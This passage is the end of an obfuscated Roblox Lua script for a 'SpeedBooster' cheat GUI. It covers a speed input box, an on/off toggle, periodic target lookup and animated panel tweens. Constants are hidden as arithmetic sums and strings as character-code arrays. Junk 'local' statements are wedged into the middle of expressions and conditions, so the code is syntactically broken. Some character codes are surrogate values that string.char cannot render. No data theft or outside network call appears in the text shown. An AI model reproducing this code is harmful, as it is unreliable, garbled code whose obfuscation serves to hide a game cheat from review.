    if num and num >= (624+(-608)) and num <= (525+(-325)) then
        SpeedBooster.speedValue = num
        speedValue = num
        speedBox.Text = tostring(num)
        if SpeedBooster.running;local nSNzyC=402+270; then
            SpeedBooster:Stop()
            SpeedBooster:Start()
        end
    else
        speedBox.Text = tostring(speedValue)
    end
end)

speedBtn.MouseButton1Click:Connect(function()
    if SpeedBooster.running;local OAUfE7=1946+634; then
        SpeedBooster:Stop()
        speedBtn.Text = (function() local _t={55357,56628,32,83,80,69,69,68,58,32,79,70,70} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
        speedBtn.BackgroundColor3 = Color3.fromRGB((837+(-797)), (137+(-137)), (409+(-409)))
        status.Text = (function() local _t={55357,57314,32,82,69,65,68,89} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
        status.TextColor3 = Color3.fromRGB((463+(-363)), (947+(-692)), (327+(-227)))
    else
        SpeedBooster:Start()
        speedBtn.Text = (function() local _t={55357,57314,32,83,80,69,69,68,58,32,79,78} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
        speedBtn;local RBmjUy=1736+700;.BackgroundColor3 = Color3.fromRGB((201+(-171)), (195+(-135)), (228+(-228)))
        status.Text = (function() local _t={9889,32,83,80,69,69,68,58,32} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)() .. speedValue
        status.TextColor3 = Color3.fromRGB((421+(-166)), (338+(-138)), (718+(-668)))
    end
end)

task.spawn(function()
    while gui and gui.Parent do
        if not target or not target.Parent then
            target = findTarget()
        end
        task.wait((594+(-593)))
    end
end)

player.CharacterAdded:Connect(function()
    if SpeedBooster.running then
        task.delay(0.5, function()
            SpeedBooster:Start()
        end)
    end
end)

updateSliderFromPower()


frame.Size = UDim2.fromOffset((843+(-843)), (118+(-118)))
frame.Position = UDim2.fromScale(0.5, 0.3)
frame.BackgroundTransparency = (800+(-799))
border.Transparency = (110+(-109))
innerGlow.Transparency = (814+(-813))
outerGlow.Transparency;local J3aT9u=1361+729; = (806+(-805))

task.wait(0.1)

 sequenceTime;local GQsuq0=2665+802; = 0.2

TweenService:Create(frame, TweenInfo.new(sequenceTime, Enum.EasingStyle.Cubic, Enum.EasingDirection.Out), {
    BackgroundTransparency = (205+(-205))
}):Play()
task.wait(sequenceTime)

TweenService:Create(frame, TweenInfo;local frMhL_=7438+51;.new(sequenceTime * 1.5, Enum.EasingStyle.Back, Enum.EasingDirection.Out), {
    Size = UDim2.fromOffset((168+(52)), (117+(-117)))
}):Play()
task.wait(sequenceTime)

TweenService:Create(frame, TweenInfo.new(sequenceTime * 1.5, Enum.EasingStyle;local DugAaK=7152+657;.Back, Enum.EasingDirection.Out), {
    Size = UDim2.fromOffset((539+(-319)), (823+(-593)))
}):Play()

TweenService:Create(frame, TweenInfo.new(sequenceTime * (378+(-376)), Enum.EasingStyle.Elastic, Enum.EasingDirection.Out), {
    Position = UDim2.fromScale(0.5, 0.5)
}):Play()

task.wait(sequenceTime * 0.5)
TweenService:Create(border;local EZR692=5802+12;, TweenInfo.new(sequenceTime * 1.5, Enum.EasingStyle.Cubic, Enum.EasingDirection.Out), {
    Transparency = (418+(-418))
}):Play()

TweenService:Create(innerGlow, TweenInfo.new(sequenceTime * 1.5, Enum.EasingStyle.Cubic, Enum.EasingDirection.Out), {
    Transparency = 0.9
}):Play()

TweenService:Create(outerGlow, TweenInfo.new(sequenceTime * 1.5, Enum.EasingStyle.Cubic, Enum.EasingDirection.Out), {
    Transparency = 0.95
}):Play()

for i, bubble in ipairs(bubbles) do
    bubble.BackgroundTransparency = (881+(-880))
    task.spawn(function()
        task.wait(sequenceTime * 0.5 + (i * 0.03))
        if bubble then
            TweenService:Create(bubble, TweenInfo;local YeEI3r=9367+957;.new(0.3, Enum.EasingStyle.Cubic, Enum.EasingDirection.Out), {
                BackgroundTransparency = math.random((944+(-940)), (348+(-341))) / (784+(-774))
            }):Play()
        end
    end)
end
end
